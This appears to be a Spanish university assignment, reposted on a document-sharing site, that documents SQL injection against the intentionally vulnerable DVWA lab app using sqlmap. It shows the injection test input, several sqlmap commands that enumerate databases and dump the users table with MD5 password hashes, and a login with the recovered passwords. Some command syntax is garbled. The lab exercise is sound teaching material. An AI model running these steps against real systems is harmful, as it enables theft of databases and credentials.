Briceño_Jiménez_edgar_Favián_Realizar Ataques SQL Injection Contra La Aplicación DVWA

January 23, 2019 | Author: Fabian Briceño Jiménez | Category: Firefox, Sql, Software, Data Management, Tecnología
Share Embed Donate


Short Description

Analisis de Vulnerabilidades...

Description

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: Briceño Jiménez

04 – 07 - 2017 Nombre: Edgar Favián

Actividades Trabajo: Realizar ataques SQL Injection contra la aplicación DVWA En la siguiente actividad deberás realizar diversos ataques sobre la aplicación DVWA utilizando la técnica de SQL injection. Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto). Se valorará positivamente que expliques debidamente los pasos seguidos para la realización de cada ataque. Tendrás que: » Indicar cuál/cuáles son los parámetros vulnerables de la URL. » Obtener los nombres de las bases de datos disponibles. » Recuperar los nombres de las tablas de la base de datos dvwa. » Recuperar el contenido de las tablas de la base de datos dvwa. Extensión máxima: 10 páginas (Georgia 11 e interlineado 1,5). DESARROLLO DE LA ACTIVIDAD Verificamos la IP de la máquina metasploitable.

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: Briceño Jiménez

04 – 07 - 2017 Nombre: Edgar Favián

Accedemos vía web a esa IP y escogemos la aplicación DVWA.

Ya tenemos acceso al aplicativo. Las credenciales de acceso son “admin” y “password”

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: Briceño Jiménez

04 – 07 - 2017 Nombre: Edgar Favián

Indicar cuáles son los parámetros vulnerables de la URL Una buena forma ingresar la sentencia ?id='q&Submit=Submit# en la URL, y si nos da como resultado un error SQL, sabemos que es vulnerable.

Obtener los nombres de las bases de datos disponibles Ingresamos a la aplicación sqlmap de kali linux

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: Briceño Jiménez

04 – 07 - 2017 Nombre: Edgar Favián

Ejecutamos la siguiente sentencia para que nos muestre las bases de datos disponibles. sqlmap

-–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;

rv:54.0)

Gecko/20100101

Firefox/54.0"

–-cookie="security=low"

PHPSESSID=21ª5021843c8f7280a79c68b452ffce6"

–u

http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –-dbs

Terminada la ejecución de la acción indicada, nos muestra 7 bases de datos encontradas:

Recuperar los nombres de las tablas de la base de datos dvwa. Para recuperar los nombres de la base de datos DVWA, ingresamos la sentencia: sqlmap

-–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;

rv:54.0)

Gecko/20100101

Firefox/54.0"

PHPSESSID=21ª5021843c8f7280a79c68b452ffce6"

–-cookie="security=low" –u

http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –D dvwa –-tables

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: Briceño Jiménez

04 – 07 - 2017 Nombre: Edgar Favián

Nos muestra las 2 tablas de la base de datos DVWA.

Recuperar el contenido de las tablas de la base de datos dvwa. Tabla guestbook: Utilizamos la siguiente sentencia para obtener el contenido de ésta tabla: sqlmap

-–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;

rv:54.0)

Gecko/20100101

Firefox/54.0"

PHPSESSID=21ª5021843c8f7280a79c68b452ffce6"

–-cookie="security=low" –u

http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –batch –dump –T guestbook –D dvwa

Contenido de tabla nos muestra lo siguiente:

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: Briceño Jiménez

04 – 07 - 2017 Nombre: Edgar Favián

Tabla users De igual forma se usa la misma sentencia, pero cambiamos el nombre de la tabla, así: sqlmap

-–headers="Users-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64;

rv:54.0)

Gecko/20100101

Firefox/54.0"

PHPSESSID=21ª5021843c8f7280a79c68b452ffce6"

–-cookie="security=low" –u

http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#" –batch –dump –T users –D dvwa

Además de mostrarnos el contenido, nos indica que el contenido de la tabla users tiene encriptación md5. El contenido de la tabla es el siguiente:

Para comprobar las contraseñas encontradas en la tabla anterior, ingresamos a la aplicación web:

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

Asignatura Análisis de Vulnerabilidades

Datos del alumno

Fecha

Apellidos: Briceño Jiménez

04 – 07 - 2017 Nombre: Edgar Favián

Y vemos que podemos acceder con las contraseñas obtenidas.

TEMA 3 – Actividades

© Universidad Internacional de La Rioja, S. A. (UNIR)

View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF